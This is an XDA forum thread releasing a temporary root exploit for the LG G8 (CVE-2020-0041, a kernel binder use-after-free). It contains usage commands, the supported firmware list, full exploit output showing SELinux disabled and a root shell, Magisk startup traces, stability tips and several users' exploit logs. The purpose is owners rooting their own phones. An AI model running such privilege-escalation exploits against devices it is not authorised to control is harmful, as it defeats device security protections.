• Introducing XDA Computing: Discussion zones for Hardware, Software, and more!    Check it out!

[LG G8] temp root exploit via CVE-2020-0041 including magisk setup

Search This thread
By:
Advanced…
J

j4nn

Senior Member
Jan 4, 2012
1,227
2,404
temp root exploit for LG G8 ThinQ with android 10 firmware
including temporal magisk setup from the exploit

The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
I have adapted the Pixel 3 specific exploit for kernel 4.14 that is used with LG phones running Android 10 with March security patch level.
This work has been done upon request of @Inerent who contributed not only with very fine donations, but also did all the testing on his LG phone, as I do not own any LG phone myself.

As an addon I have implemented setup of magisk v20.4 from temp root exploit included su permission asking notification support, that has been also a hell of work to get working.

SUPPORTED TARGETS
You can find currently running fw version with 'getprop ro.vendor.lge.factoryversion' command run in an adb shell.
  • LMG820NAT-00-V20j-LAO-COM-FEB-12-2020+0
  • LMG820NAT-00-V20m-LAO-COM-MAR-18-2020+0
  • LMG820AT-00-V20a-LAO-COM-DEC-23-2019-ARB00+9
  • LMG820AT-00-V20b-LAO-COM-JAN-10-2020-ARB00+0
  • LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2
  • LMG820AT-00-V20c-LAO-COM-MAR-19-2020-ARB00+0
  • LMG820AT-00-V20d-LAO-COM-JAN-28-2020-ARB00+0
  • LMG820AT-00-V20a-LAO-COM-NOV-25-2019-ARB00+0 - Sprint G8 Android 10 beta November 2019 security patch (special treat for @antintin)
  • LMG820AT-00-V20d-LAO-COM-DEC-17-2019-ARB00+1 - Sprint G8 fw 20d
  • LMG820AT-00-V20d-LAO-COM-JAN-29-2020-ARB00+0 - T-Mobile US G8 January 2020 security patch
  • LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0 - Sprint G8 fw 20e February 2020 patch
  • LMG820AT-00-V20a-LAO-COM-JAN-09-2020-ARB00+5 - Verizon G8 fw 20a
  • LMG820AT-00-V20i-LAO-COM-JAN-07-2020-ARB00+0 - AT&T G8 fw 20i
  • LMG820AT-00-V20j-LAO-COM-FEB-04-2020-ARB00+0 - AT&T G8 G820UM fw 20j
  • LMG820AT-00-V21b-LAO-COM-FEB-05-2020-ARB00+1 - Amazon G8 (G820QM821b_01_AMZ_US_OP_0205)
Please note, it is unlikely that any other fw version than those listed above would work.
The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.

USAGE HOWTO
  • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
  • enable developer mode options and in there adb debugging (eventually install adb drivers)
  • download the v50g8-mroot3.zip with the exploit attached in this post and unzip it
  • use 'adb push v50g8-mroot3 /data/local/tmp' and get temp root with following commands in 'adb shell':
    Code: 
    cd /data/local/tmp
chmod 755 ./v50g8-mroot3
./v50g8-mroot3

If it worked, you should see something like this:
Code: 
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
...
[+] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp # getenforce
Permissive
root_by_cve-2020-0041:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root) context=kernel
root_by_cve-2020-0041:/data/local/tmp #

In case you get 'target is not supported', you may list supported targets with
Code: 
./v50g8-mroot3 -T
and try to force one close to yours using '-t num' option.

Please see the 2nd post for magisk setup from temp root details.

Please be careful what you use the temp root for.
Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or kernel boot partition, can result with a not anymore booting phone.
In such case you would need a way to emergency flash stock firmware to recover.
This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow to make permanent changes in crucial partitions until bootloader unlock is achieved.
Some partitions might still be possible to modify - for example in case of sony xperia phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.

SOURCES
Exploit sources for all releases are available at my github here.

CREDITS
Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

MEMORY DUMP FOR NEW TARGETS
Implemented a tool that dumps kernel space memory to a file with the aim to hopefully be able to analyse it for adding new target support in case it does not have a downloadable firmware.
You can start it similarly as done with v50g8-mroot3, including the '-t num' option.

Use this tool only in case your phone is not supported but it is exploitable (i.e. v50g8-mroot3 does something reasonable /with any '-t num' option/ including crash/reboot of the phone).
When v50g8-mroot3 says "target is not supported", use 'v50g8-mroot3 -T' to list supported targets and then 'v50g8-mroot3 -t num' changing num to each one of listed targets, one by one.
Watch the output log to see which is the most successful (the longest reasonable output if you do not count looping/repeating the same lines).

With this way found the most close target, remember the '-t num' option and use it with v50g8-dump.
The tool hopefully creates /data/local/tmp/memdump.bin file and sleep indefinitely then.
Just open another cmd window and use
Code: 
adb pull /data/local/tmp/memdump.bin
to get the file to your PC, compress it to an archive and post it here - it may eventually help to add support for new target which does not have a downloadable fw, like for example Sprint models.

DONATIONS
If you like my work, you can donate using the Donate to Me button with several methods there.

Already donated:
Thank you very much to all who donated or are about to donate.

DOWNLOAD
 

Attachments

  • v50g8-dump.zip
    17.3 KB · Views: 427
  • v50g8-mroot.zip
    21.4 KB · Views: 460
  • v50g8-mroot2.zip
    21.7 KB · Views: 249
  • v50g8-mroot3.zip
    20.7 KB · Views: 490
Last edited:
  • Like
Reactions: netmsm, quanqw, Mspy1 and 12 others
J

j4nn

Senior Member
Jan 4, 2012
1,227
2,404
MAGISK SETUP FROM TEMP ROOT WITH LOCKED BOOTLOADER
To enjoy the temporal root with apps asking for root permission, you can now start magisk v20.4 from the root shell provided by the exploit.
  • download the v50g8-mroot3.zip with the exploit attached in the first post
  • download Magisk-v20.4.zip from magisk releases page on github here
  • use 'adb push v50g8-mroot3.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
  • unzip and prepare magisk setup with following commands in 'adb shell'
    Code: 
    cd /data/local/tmp
unzip v50g8-mroot3.zip
chmod 755 v50g8-mroot3 magisk-setup.sh magisk-start.sh
./magisk-setup.sh
  • get temp root and start magisk up with following commands in 'adb shell':
    Code: 
    cd /data/local/tmp
./v50g8-mroot3
./magisk-start.sh -1
./magisk-start.sh -2
./magisk-start.sh -3
    just this point should be done after each reboot to get magisk running again.
    NOTE: please be sure to enter each command separately, line after line - do not paste all in a single block and do not put them in a script.
    There are reasons this is divided in 3 stages. With this approach I got the best stability, while putting ./v50g8-mroot3 together with -1 and/or -2 stuff in a single script run resulted with a reboot most of the time.
    Phases 2 and 3 need to be split for functional reasons to start magisk with working su permission asking notification.

If it worked, you should see something like this:

Code: 
alphalm:/ $ cd /data/local/tmp
alphalm:/data/local/tmp $ ./v50g8-mroot3
[+] factoryversion = LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffd07822fa00
[+] file epitem at ffffffd102da6d00
[+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
[+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff9dee01ebf8
[+] kernel base: ffffff9dece80000
[+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
[+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
[+] init_cred: ffffff9def02fcd0
[+] memstart_addr: 0xfffffff040000000
[+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
[+] Second level entry: ae419003 -> next table at ffffffd06e419000
[+] sysctl_table_root = ffffff9def05c710
[+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
[+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
[+] Injected sysctl node!
[+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[+] epitem.next = ffffffd07822fa20
[+] epitem.prev = ffffffd07822fad8
[+] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1                                                                                                                                                     
+ FRESH=false 
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
Load policy from: /sys/fs/selinux/policy
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2                                                                                                                                                     
+ FRESH=false 
+ '[' -2 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=2 
+ '[' 2 '=' 2 ']'
+ mount -t tmpfs -o 'mode=755' none /sbin
+ chcon u:object_r:rootfs:s0 /sbin
+ chmod 755 /sbin
+ cp -a magisk/boot_patch.sh /sbin
+ cp -a magisk/magiskboot /sbin
+ cp -a magisk/magiskinit64 /sbin
+ cp -a magisk/busybox /sbin
+ cp -a magisk/util_functions.sh /sbin
+ cd /sbin
+ chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
+ mkdir r
+ mount -o bind / r
+ cp -a r/sbin/. /sbin
+ umount r
+ rmdir r
+ mv magiskinit64 magiskinit
+ ./magiskinit -x magisk magisk
+ ln -s /sbin/magiskinit /sbin/magiskpolicy
+ ln -s /sbin/magiskinit /sbin/supolicy
+ false
+ chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
+ rm -f magiskboot util_functions.sh boot_patch.sh
+ ln -s /sbin/magisk /sbin/su
+ ln -s /sbin/magisk /sbin/resetprop
+ ln -s /sbin/magisk /sbin/magiskhide
+ mkdir /sbin/.magisk
+ chmod 755 /sbin/.magisk
+ >/sbin/.magisk/config 
+ echo 'KEEPVERITY=true'
+ >>/sbin/.magisk/config 
+ echo 'KEEPFORCEENCRYPT=true'
+ chmod 000 /sbin/.magisk/config
+ mkdir -p /sbin/.magisk/busybox
+ chmod 755 /sbin/.magisk/busybox
+ mv busybox /sbin/.magisk/busybox
+ mkdir -p /sbin/.magisk/mirror
+ chmod 000 /sbin/.magisk/mirror
+ mkdir -p /sbin/.magisk/block
+ chmod 000 /sbin/.magisk/block
+ mkdir -p /sbin/.magisk/modules
+ chmod 755 /sbin/.magisk/modules
+ mkdir -p /data/adb/modules
+ chmod 755 /data/adb/modules
+ mkdir -p /data/adb/post-fs-data.d
+ chmod 755 /data/adb/post-fs-data.d
+ mkdir -p /data/adb/service.d
+ chmod 755 /data/adb/service.d
+ chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
+ chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
+ /sbin/magisk --daemon
client: launching new main daemon process
+ pidof magiskd
+ MP=14148 
+ '[' -z 14148 ']'
+ >/sbin/.magisk/escalate 
+ echo 14148
+ '[' -e /sbin/.magisk/escalate ']'
+ sleep 1
+ '[' -e /sbin/.magisk/escalate ']'
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3                                                                                                                                                     
+ FRESH=false 
+ '[' -3 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=3 
+ '[' 3 '=' 2 ']'
+ >/sbin/.magisk/magiskd 
+ echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
+ chmod 755 /sbin/.magisk/magiskd
+ chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
+ getprop init.svc.dumpstate
+ SVC='' 
+ timeout=10 
+ '[' 10 -gt 0 ']'
+ stop dumpstate
+ killall -9 magiskd
+ stop dumpstate
+ mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
+ start dumpstate
+ timeout=10 
+ '[' 10 -le 0 ']'
+ pidof magiskd
+ MP=14165 
+ '[' -n 14165 ']'
+ break
+ stop dumpstate
+ sleep 1
+ umount /system/bin/dumpstate
+ rm -f /sbin/.magisk/magiskd
+ '[' '' '=' running ']'
+ rm -f /dev/.magisk_unblock
+ /sbin/magisk --post-fs-data
+ timeout=10 
+ '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
+ sleep 1
+ timeout=9 
+ '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
+ /sbin/magisk --service
+ sleep 1
+ /sbin/magisk --boot-complete
+ chmod 751 /sbin
root_by_cve-2020-0041:/data/local/tmp # id                                                                                                                                                                       
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
root_by_cve-2020-0041:/data/local/tmp # uname -a
Linux localhost 4.14.117-perf #1 SMP PREEMPT Tue Mar 10 18:44:38 KST 2020 aarch64
root_by_cve-2020-0041:/data/local/tmp # getenforce                                                                                                                                                               
Permissive

Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission now works.
You can even re-enable selinux like this from 'adb shell':
Code: 
su -c 'setenforce 1'
The magisk setup from exploit including working permission asking has been fully developed by me, it uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as a service.

TIPS FOR BETTER STABILITY OF THE EXPLOIT
The exploit works based on use after free, that means it depends on state of memory heap and how it changes during exploit time.
That means there is some portion of unpredictability and a chance that something else is overwritten than hoped for by shaping the heap.
So to get best results, one should stop anything that could run in background, like:
  • set airplain mode, turn off wifi and bluetooth so there is no data connection at all
  • set "Stay awake" to ON while charging (i.e. using adb shell) in developer options
  • disable auto updates of system and apps
  • debloat your system so useless apps do not run in background
  • reboot your phone having all the above
  • wait two minutes after boot up with phone unlocked, screen on connected to PC via usb cable having 'adb shell' already active (checking with 'uptime' command)
  • start the exploit
  • after getting root shell and succesfuly starting magisk, do not forget to properly exit the temp root shell by use of 'exit' command two times, so the 'adb shell' with the exploit is ended with the rest of clean up

CHANGELOG
  • 2020-05-16 : multiple targets supported (v50g8-root)
  • 2020-05-20 : added v50g8-dump tool to dump kernel space memory
  • 2020-05-24 : implemented support for magisk start from the exploit (v50g8-mroot), added support for 4 new G8 targets (3 x Sprint and one T-Mobile US)
  • 2020-06-10 : fixed problem when V50 rebooted/crashed soon after obtaining temp root shell, added support for 3 new G8 targets (Verizon and 2 x AT&T), released as v50g8-mroot2
  • 2020-06-23 : added support for Amazon G8 target and hopefully fixed not getting a root shell problem with mroot2 on G8, released as v50g8-mroot3
 
Last edited:
  • Like
Reactions: netmsm, traybourne, crazynapkinman and 3 others
T

tron1

Senior Member
Aug 24, 2005
187
164
Stuttgart
This is my result for Sprint G8 February patch overiding with -t 4 "LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2"
It stucks with the line "[*] Reallocating content of 'write8_selinux' with controlled data................."

Edit: Tried it again with the same -t 4 parameter, guess what? I have ROOT! (*) see below.

alphalm:/data/local/tmp $ ./v50g8-root -t 4
./v50g8-root -t 4
[+] factoryversion = 'LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0'
[+] forced use of 'LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
.
.
.
sched_setafinnity(): Invalid argument
[+] pipe file: 0xfffffff0aeced700
[*] file epitem at ffffffef820efd00
[*] Reallocating content of 'write8_inode' with controlled data......[DONE]
[+] Overwriting 0xfffffff0aeced720 with 0xffffffef820efd50...[DONE]
[*] Write done, should have arbitrary read now.
[+] file operations: ffffff821ca21050
[+] kernel base: ffffff821b480000
[*] init_cred: ffffff821d82e588
[+] memstart_addr: 0xffffffd100000000
[+] First level entry: b43c0003 -> next table at ffffffefb43c0000
[+] Second level entry: dd466003 -> next table at ffffffefdd466000
[+] sysctl_table_root = ffffff821d85b098
[*] Reallocating content of 'write8_sysctl' with controlled data..............[DONE]
[+] Overwriting 0xfffffff0f534b768 with 0xffffffefffacd000...[DONE]
[+] Injected sysctl node!
[*] Reallocating content of 'write8_selinux' with controlled data.................


(*)
alphalm:/data/local/tmp $ ./v50g8-root -t 4
./v50g8-root -t 4
[+] factoryversion = 'LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0'
[+] forced use of 'LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
sched_setafinnity(): Invalid argument
.
.
.
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
[+] pipe file: 0xffffffe2a13e0000
[*] file epitem at ffffffe2cc823800
[*] Reallocating content of 'write8_inode' with controlled data..[DONE]
[+] Overwriting 0xffffffe2a13e0020 with 0xffffffe2cc823850...[DONE]
[*] Write done, should have arbitrary read now.
[+] file operations: ffffff8a59221050
[+] kernel base: ffffff8a57c80000
[*] init_cred: ffffff8a5a02e588
[+] memstart_addr: 0xffffffde40000000
[+] First level entry: 1221a8003 -> next table at ffffffe2e21a8000
[+] Second level entry: 1221a1003 -> next table at ffffffe2e21a1000
[+] sysctl_table_root = ffffff8a5a05b098
[*] Reallocating content of 'write8_sysctl' with controlled data........[DONE]
[+] Overwriting 0xffffffe3b534a468 with 0xffffffe2cf35e000...[DONE]
[+] Injected sysctl node!
[*] Reallocating content of 'write8_selinux' with controlled data.[DONE]
[+] Overwriting 0xffffff8a5a7ceffc with 0x0...[DONE]
[*] Node write8_inode, pid 7360, kaddr ffffffe25d899400
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_selinux, pid 7099, kaddr ffffffe2cc8e6400
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_sysctl, pid 7384, kaddr ffffffe33791d380
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[*] epitem.next = ffffffe2a13e0020
[*] epitem.prev = ffffffe2a13e00d0
[*] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp #
 
Last edited:
  • Like
Reactions: j4nn
siulmagic

siulmagic

Senior Member
Jun 23, 2007
3,512
2,563
Bridgeport
This is on my sprint g8 , forced with -t 7, witch is the closes one to my firmware. my log https://pastebin.com/sfgDn8kb

Edit: it seems I did not use -t num closes to my firmware, I don't quit understand witch firmware corresponds to what number.

Edit2:NVM I think I figured it out.

edit3: got Temp root with -t 2 this is my log https://pastebin.com/zUEucCie. software version 20d
firmware LMG820AT-00-V20d-LAO-COM-DEC-17-2019-ARB00+1
 
Last edited:
  • Like
Reactions: j4nn
J

j4nn

Senior Member
Jan 4, 2012
1,227
2,404
Please keep posting your logs from the exploit confirming your target to work.
In case you have an unsupported target, like Sprint for example and you find any '-t num' option eventually working, please be sure to post it here with info about your phone model and carrier. It would be useful for others.
Thanks.
 
  • Like
Reactions: Inerent
F

firedroidx

Senior Member
Dec 20, 2015
72
11
Ohio
AT&T people running LMG820AT-00-V20j-LAO-COM-FEB-04-2020-ARB00+0, I think we might be out of luck for now. I've tried every single forced target. Here's my log.
C:\adb tools\platform-tools>adb push v50g8-root /data/local/tmp
v50g8-root: 1 file pushed. 1.2 MB/s (42984 bytes in 0.034s)

C:\adb tools\platform-tools>adb shell
alphalm:/ $ cd /data/local/tmp
alphalm:/data/local/tmp $ chmod 755 ./v50g8-root
alphalm:/data/local/tmp $ ./v50g8-root -T
supported targets:
0 : LMG820NAT-00-V20j-LAO-COM-FEB-12-2020+0
1 : LMG820NAT-00-V20m-LAO-COM-MAR-18-2020+0
2 : LMG820AT-00-V20a-LAO-COM-DEC-23-2019-ARB00+9
3 : LMG820AT-00-V20b-LAO-COM-JAN-10-2020-ARB00+0
4 : LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2
5 : LMG820AT-00-V20c-LAO-COM-MAR-19-2020-ARB00+0
6 : LMG820AT-00-V20d-LAO-COM-JAN-28-2020-ARB00+0
7 : LMV500AT-00-V20a-LAO-COM-JAN-24-2020+0
8 : LMV500AT-00-V20e-LAO-COM-JAN-23-2020+0
9 : LMV500AT-00-V20g-LAO-COM-MAR-10-2020+0
10 : LMV500NAT-00-V20b-LAO-COM-DEC-23-2019+0
11 : LMV500NAT-00-V20f-LAO-COM-JAN-31-2020+0
12 : LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0
alphalm:/data/local/tmp $ ./v50g8-root -t 4
[+] factoryversion = 'LMG820AT-00-V20j-LAO-COM-FEB-04-2020-ARB00+0'
[+] forced use of 'LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
sched_setafinnity(): Invalid argument
..............
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
[+] pipe file: 0xffffffc7da0f0200
[*] file epitem at ffffffc810e0e700
[*] Reallocating content of 'write8_inode' with controlled data....[DONE]
[+] Overwriting 0xffffffc7da0f0220 with 0xffffffc810e0e750...[DONE]
[*] Write done, should have arbitrary read now.
[+] file operations: ffffff9d68421050
[+] kernel base: ffffff9d66e80000
[*] init_cred: ffffff9d6922e588
[+] memstart_addr: 0x73253d45505954
[+] First level entry: 14beda003 -> next table at ffffffc4069d46ac

^ Phone reboots after this line. With certain targets it gets stuck at "Reallocating content of 'write8_inode' with controlled data.............," but for the G820 targets it always does what's shown above.

I did a factory reset and followed the steps of disabling network, rebooting, etc to see if it would work. Nothing so far. Any other AT&T G820UM people let me know if you find anything
 
B

brigantti

Senior Member
Jul 25, 2013
155
19
Calexico
Now that we got temp root i would like to ask can i make changes to builprop?or it will brick the phone after reboot?i got sprint g8 so theres no kdz for it.

---------- Post added at 11:07 PM ---------- Previous post was at 10:52 PM ----------

Lg g8 sprint 20e temproot
log from powershell

PS C:\adb binaries\adb binaries> adb shell
adb server is out of date. killing...
* daemon started successfully *
alphalm:/ $ cd /data/local/tmp
alphalm:/data/local/tmp $ chmod 755 ./v50g8-root
alphalm:/data/local/tmp $ ./v50g8-root
[+] factoryversion = 'LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0'
target is not supported.
1|alphalm:/data/local/tmp $ ./v50g8-root -t 4
[+] factoryversion = 'LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0'
[+] forced use of 'LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
[+] pipe file: 0xffffffeb21b58900
[*] file epitem at ffffffeb328e1780
[*] Reallocating content of 'write8_inode' with controlled data..[DONE]
[+] Overwriting 0xffffffeb21b58920 with 0xffffffeb328e17d0...[DONE]
[*] Write done, should have arbitrary read now.
[+] file operations: ffffff8e75e21050
[+] kernel base: ffffff8e74880000
[*] init_cred: ffffff8e76c2e588
[+] memstart_addr: 0xffffffd600000000
[+] First level entry: 137d8c003 -> next table at ffffffeb37d8c000
[+] Second level entry: 15c0b4003 -> next table at ffffffeb5c0b4000
[+] sysctl_table_root = ffffff8e76c5b098
[*] Reallocating content of 'write8_sysctl' with controlled data........[DONE]
[+] Overwriting 0xffffffebf534b468 with 0xffffffebc8a14000...[DONE]
[+] Injected sysctl node!
[*] Reallocating content of 'write8_selinux' with controlled data....[DONE]
[+] Overwriting 0xffffff8e773ceffc with 0x0...[DONE]
[*] Node write8_inode, pid 17471, kaddr ffffffeae0c9ec00
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_selinux, pid 17342, kaddr ffffffeb20036380
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_sysctl, pid 17947, kaddr ffffffebcd377400
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[*] epitem.next = ffffffeb21b58920
[*] epitem.prev = ffffffeb21b589d0
[*] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp #
 
siulmagic

siulmagic

Senior Member
Jun 23, 2007
3,512
2,563
Bridgeport
brigantti said:
Now that we got temp root i would like to ask can i make changes to builprop?or it will brick the phone after reboot?i got sprint g8 so theres no kdz for it.

---------- Post added at 11:07 PM ---------- Previous post was at 10:52 PM ----------

Lg g8 sprint 20e temproot
log from powershell

PS C:\adb binaries\adb binaries> adb shell
adb server is out of date. killing...
* daemon started successfully *
alphalm:/ $ cd /data/local/tmp
alphalm:/data/local/tmp $ chmod 755 ./v50g8-root
alphalm:/data/local/tmp $ ./v50g8-root
[+] factoryversion = 'LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0'
target is not supported.
1|alphalm:/data/local/tmp $ ./v50g8-root -t 4
[+] factoryversion = 'LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0'
[+] forced use of 'LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
[+] pipe file: 0xffffffeb21b58900
[*] file epitem at ffffffeb328e1780
[*] Reallocating content of 'write8_inode' with controlled data..[DONE]
[+] Overwriting 0xffffffeb21b58920 with 0xffffffeb328e17d0...[DONE]
[*] Write done, should have arbitrary read now.
[+] file operations: ffffff8e75e21050
[+] kernel base: ffffff8e74880000
[*] init_cred: ffffff8e76c2e588
[+] memstart_addr: 0xffffffd600000000
[+] First level entry: 137d8c003 -> next table at ffffffeb37d8c000
[+] Second level entry: 15c0b4003 -> next table at ffffffeb5c0b4000
[+] sysctl_table_root = ffffff8e76c5b098
[*] Reallocating content of 'write8_sysctl' with controlled data........[DONE]
[+] Overwriting 0xffffffebf534b468 with 0xffffffebc8a14000...[DONE]
[+] Injected sysctl node!
[*] Reallocating content of 'write8_selinux' with controlled data....[DONE]
[+] Overwriting 0xffffff8e773ceffc with 0x0...[DONE]
[*] Node write8_inode, pid 17471, kaddr ffffffeae0c9ec00
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_selinux, pid 17342, kaddr ffffffeb20036380
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_sysctl, pid 17947, kaddr ffffffebcd377400
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[*] epitem.next = ffffffeb21b58920
[*] epitem.prev = ffffffeb21b589d0
[*] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp #
Click to expand...
Click to collapse

Do not make changes to system parttions untill we have fully working magisk, and bl unlock.
 
  • Like
Reactions: brigantti
crazynapkinman

crazynapkinman

Senior Member
Jun 16, 2014
1,193
272
OnePlus 8
j4nn said:
Please keep posting your logs from the exploit confirming your target to work.
In case you have an unsupported target, like Sprint for example and you find any '-t num' option eventually working, please be sure to post it here with info about your phone model and carrier. It would be useful for others.
Thanks.
Click to expand...
Click to collapse

PS C:\Users\Matt Hinkle\Desktop\adb binaries> cmd
Microsoft Windows [Version 10.0.19041.264]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\Users\Matt Hinkle\Desktop\adb binaries>adb devices
List of devices attached
LMG820UMcd000429 device


C:\Users\Matt Hinkle\Desktop\adb binaries>adb shell
alphalm:/ $ cd data/local/tmp
alphalm:/data/local/tmp $ chmod r77 ./v50g8-root
chmod: bad mode 'r77'
1|alphalm:/data/local/tmp $ chmod 755 ./v50g8-root
alphalm:/data/local/tmp $ ./v50g8-root -t 4
[+] factoryversion = 'LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0'
[+] forced use of 'LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
[+] pipe file: 0xffffffe78e7f9700
[*] file epitem at ffffffe7693ca800
[*] Reallocating content of 'write8_inode' with controlled data........[DONE]
[+] Overwriting 0xffffffe78e7f9720 with 0xffffffe7693ca850...[DONE]
[*] Write done, should have arbitrary read now.
[+] file operations: ffffff9698421050
[+] kernel base: ffffff9696e80000
[*] init_cred: ffffff969922e588
